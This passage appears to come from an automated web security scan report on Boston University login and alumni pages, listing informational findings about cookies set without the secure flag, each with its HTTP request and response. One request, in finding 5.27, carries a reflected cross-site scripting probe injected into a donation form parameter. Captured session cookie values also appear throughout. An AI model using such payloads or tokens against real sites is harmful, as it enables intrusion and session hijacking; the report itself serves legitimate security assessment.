Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; credsrv3=cussp-srv4; wl4data=1361f4db6536328d0e4837bb82138064%3Acussp-srv4%2Ckey%3D1317837446.11881; wl4cap=1317837588%2Cjsver%3D1.5p%2Cbrowser%3Dun%2Cflash%3D0; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.21.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bu_session=a48b5fc44e9c3778dbfa93d21a2f878d%3Acussp-srv3; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:06:23 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
X-BU-Tag: CHECK-SHORTEN(length) https://127.0.0.1//web@login3
X-UniqueID: ToycnwrxHDsAAAJizks
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Expires: Wed, 05 Oct 2011 18:06:23 GMT
X-BU-Main-Uniqueid: ToycnwrxHDsAAGaXUrcAAAAm
X-BU-Duration: D=73727061
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 5622

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Weblogin Browser Check</title>
<!-- BUTag(check) -->
<script LANGUAGE=
...[SNIP]...

5.17. https://weblogin.bu.edu/weblogin/webnew/bu-filler-head.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /weblogin/webnew/bu-filler-head.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /weblogin/webnew/bu-filler-head.gif HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://weblogin.bu.edu/accounts/forgot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:49:59 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Last-Modified: Tue, 20 Apr 2004 19:06:24 GMT
ETag: "4211040100b7-26f-3d8845fc28c00"
Accept-Ranges: bytes
Content-Length: 623
X-BU-Main-Uniqueid: ToyYxwrxHDsAAFhgGggAAAAo
X-BU-Duration: D=9614
X-BU-Backend: (null) (null)
Connection: close
Content-Type: image/gif

GIF89a...................!.......,.............................H....*.....1...-....7...........Ia..\:....Z.^.....g.c...E...6..v......W.........xG.'.X8..x..h...H.h)    9y..Y........:*j.........z:.*[..K..
...[SNIP]...

5.18. https://weblogin.bu.edu/weblogin/webnew/bu-filler.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /weblogin/webnew/bu-filler.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /weblogin/webnew/bu-filler.gif HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://weblogin.bu.edu/accounts/forgot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:49:59 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Last-Modified: Tue, 20 Apr 2004 20:06:24 GMT
ETag: "4212040100b7-a6-3d88536563000"
Accept-Ranges: bytes
Content-Length: 166
X-BU-Main-Uniqueid: ToyYxwrxHDsAAFhPgAIAAAAd
X-BU-Duration: D=9603
X-BU-Backend: (null) (null)
Connection: close
Content-Type: image/gif

GIF89a.............!.......,..........}..................H...........L..........
.....L*....    .J......j............N....................(8HXhx..........)9IYiy....T..;

5.19. https://weblogin.bu.edu/weblogin/webnew/footer.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /weblogin/webnew/footer.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /weblogin/webnew/footer.gif HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://weblogin.bu.edu/accounts/forgot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:49:59 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Last-Modified: Tue, 20 Oct 2009 17:22:51 GMT
ETag: "63b1040100b7-3af-476611ca010c0"
Accept-Ranges: bytes
Content-Length: 943
X-BU-Main-Uniqueid: ToyYxwrxHDsAAFhuN6IAAAAz
X-BU-Duration: D=9357
X-BU-Backend: (null) (null)
Connection: close
Content-Type: image/gif

GIF89a..=................!.......,......=......................H.....j    ....L..........    .....L*..R.    .J......=.........-..N...6........
.........8HXhx.&.........9IYiyI!.....9..):JZ..j....:..
.+;K.J{....
...[SNIP]...

5.20. https://weblogin.bu.edu/weblogin/webnew/main-title.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /weblogin/webnew/main-title.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /weblogin/webnew/main-title.gif HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://weblogin.bu.edu/accounts/forgot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:49:59 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Last-Modified: Tue, 20 Oct 2009 17:23:08 GMT
ETag: "63b3040100b7-b44-476611da37700"
Accept-Ranges: bytes
Content-Length: 2884
X-BU-Main-Uniqueid: ToyYxwrxHDsAAFiBZTEAAABF
X-BU-Duration: D=10317
X-BU-Backend: (null) (null)
Connection: close
Content-Type: image/gif

GIF89a|...........................fffDDD.........@@@.........UUU...""".@@......```...www......PPP000... 333ppp................. ....00.``....BD.pp..........fd.PP.............FD.vt."$.VT.......
...[SNIP]...

5.21. https://weblogin.bu.edu/weblogin/webnew/sub_title.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /weblogin/webnew/sub_title.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /weblogin/webnew/sub_title.gif HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://weblogin.bu.edu/accounts/forgot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:49:59 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Last-Modified: Tue, 20 Oct 2009 17:23:18 GMT
ETag: "63b4040100b7-a34-476611e3c0d80"
Accept-Ranges: bytes
Content-Length: 2612
X-BU-Main-Uniqueid: ToyYxwrxHDsAAFhdEfAAAAAl
X-BU-Duration: D=9262
X-BU-Backend: (null) (null)
Connection: close
Content-Type: image/gif

GIF89a|...........................fffDDD.........@@@.........UUU...""".@@......```...www......PPP000... 333ppp................. ....00.``....BD.pp..........fd.PP.............FD.vt."$.VT.......
...[SNIP]...

5.22. https://weblogin.bu.edu/webnew/alumnew  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /webnew/alumnew

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webnew/alumnew HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.bu.edu/alumni/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; credsrv3=cussp-srv4; wl4data=1361f4db6536328d0e4837bb82138064%3Acussp-srv4%2Ckey%3D1317837446.11881; wl4cap=1317837588%2Cjsver%3D1.5p%2Cbrowser%3Dun%2Cflash%3D0; bu_session=a48b5fc44e9c3778dbfa93d21a2f878d%3Acussp-srv3; isMobile=false_1.2; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.20.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:05:25 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Content-Type: text/html; charset=ISO-8859-1
X-BU-Main-Uniqueid: ToycZQrxHDsAAFwVZ3oAAAAS
X-BU-Duration: D=16292141
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 29113


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_ddmenu_sidenav.dwt" codeOutsideHTMLIsLocked=
...[SNIP]...

5.23. https://www.bu.edu/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:15 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Vary: Cookie
Accept-Ranges: bytes
X-BU-Main-Uniqueid: ToyiNwrxHDYAAGKAtakAAABD
X-BU-Duration: D=7079
X-BU-Backend: (null) (null)
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...

5.24. https://www.bu.edu/alumni-forms/forms/annualfund/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /alumni-forms/forms/annualfund/index.html

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /alumni-forms/forms/annualfund/index.html HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:31:01 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 23 Feb 2011 16:23:26 GMT
ETag: "1bd4002400001234-e39a-49cf584379bbe"
Accept-Ranges: bytes
Content-Length: 58266
X-BU-Main-Uniqueid: ToyiZQrxHDYAAGUNv00AAAMX
X-BU-Duration: D=13739
X-BU-Backend: content_default (null)
Content-Type: text/html
Via: 1.1 www.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin templat
...[SNIP]...

5.25. https://www.bu.edu/alumni-forms/forms/ath/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /alumni-forms/forms/ath/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /alumni-forms/forms/ath/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:31:01 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Vary: Cookie
Last-Modified: Wed, 30 Mar 2011 20:35:24 GMT
ETag: "1bd4014400001234-1423b-49fb91dc41b58"
Accept-Ranges: bytes
Content-Length: 82491
X-BU-Main-Uniqueid: ToyiZQrxHDYAAGVNx3UAAAOV
X-BU-Duration: D=19114
X-BU-Backend: (null) (null)
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equi
...[SNIP]...

5.26. https://www.bu.edu/alumni-forms/forms/giving/online/index/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /alumni-forms/forms/giving/online/index/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /alumni-forms/forms/giving/online/index/ HTTP/1.1
Host: www.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.bu.edu/alumni/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; credsrv3=cussp-srv4; _chartbeat2=0ox0lnwgyvmm6pyy.1317665362956; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.18.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:01:13 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Vary: Cookie
Last-Modified: Tue, 24 May 2011 14:44:12 GMT
ETag: "1bd400b200001234-e4a5-4a4069f0c8744"
Accept-Ranges: bytes
Content-Length: 58533
X-BU-Main-Uniqueid: ToybaQrxHDYAAEndiNsAAAWQ
X-BU-Duration: D=12581
X-BU-Backend: (null) (null)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin templat
...[SNIP]...

5.27. https://www.bu.edu/alumni-forms/images/happygroup.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /alumni-forms/images/happygroup.jpg

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /alumni-forms/images/happygroup.jpg HTTP/1.1
Host: www.bu.edu
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.bu.edu/phpbin/telegraph/?form_location=%2Falumni-forms%2Fforms%2Fgiving%2Fonline%2Findex%2F&form_filename=index.html&form_configuration=donate.xml&first_name=&last_name=&address=&city=&state=n%2Fa&country=United+States&zip=&phone=&email=&school=n%2Fa&year=&caller=&amount_other=&matching=&number_of_months=%23+of&designation=&fund_other=2850d%3Cscript%3Ealert(document.location)%3C/script%3Ef93343ad016b277d2&comments=&submit2=Make+Your+Gift
Cookie: isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:10:07 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Set-Cookie: wantsMobile=false_1.2_default; path=/; domain=.bu.edu
Last-Modified: Thu, 29 Jul 2010 20:01:45 GMT
ETag: "1bd4022600001234-64b4-48c8c34251c47"
Accept-Ranges: bytes
Content-Length: 25780
X-BU-Main-Uniqueid: ToydfwrxHD4AAAmrTiIAAAAM
X-BU-Duration: D=10064
X-BU-Backend: content_default (null)
Content-Type: image/jpeg
Via: 1.1 www.bu.edu
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

......JFIF.....d.d......Ducky.......7......Adobe.d....................
...
.    ..    ..................................##########...............#################################################...........
...[SNIP]...

5.28. https://www.bu.edu/alumni/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /alumni/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /alumni/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:31:02 GMT
Server: Apache/2.0.52 (CentOS) DAV/2 PHP/5.1.6
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Last-Modified: Wed, 05 Oct 2011 18:21:08 GMT
Accept-Ranges: bytes
Content-Length: 19106
Cache-Control: max-age=300, must-revalidate
Expires: Wed, 05 Oct 2011 18:36:02 GMT
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToyiZgrxHDYAAGUNv1QAAAMR
X-BU-Duration: D=12731
X-BU-Backend: niscms http://wwwcms02.bu.edu
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...

5.29. https://www.bu.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.bu.edu
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _chartbeat2=0ox0lnwgyvmm6pyy.1317665362956; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:59:42 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Vary: Cookie
Last-Modified: Wed, 30 Jan 2008 00:16:42 GMT
ETag: "1bf308d800001234-13e-444e574a4ce83"
Accept-Ranges: bytes
Content-Length: 318
X-BU-Main-Uniqueid: ToybDgrxHDYAAEaPWxgAAATW
X-BU-Duration: D=5560
X-BU-Backend: (null) (null)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain

..............(.......(....... .......................................``..ff..................................................wwwwwwwwwwwwwwww.........................Ww07w0...0qt.p...0pr.p...v0r.p...
...[SNIP]...

5.30. https://www.bu.edu/help/tech/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /help/tech/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help/tech/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:39 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Vary: Cookie
Last-Modified: Mon, 02 Aug 2010 15:28:10 GMT
ETag: "1420053200001234-2ea2-48cd8d9199681"
Accept-Ranges: bytes
Content-Length: 11938
X-BU-Main-Uniqueid: ToyiTwrxHDYAAGJVrjsAAAHQ
X-BU-Duration: D=9453
X-BU-Backend: (null) (null)
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

5.31. https://www.bu.edu/help/tech/qa/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bu.edu
Path:   /help/tech/qa/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help/tech/qa/ HTTP/1.1
Host: www.bu.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 05 Oct 2011 18:30:40 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
Vary: Cookie
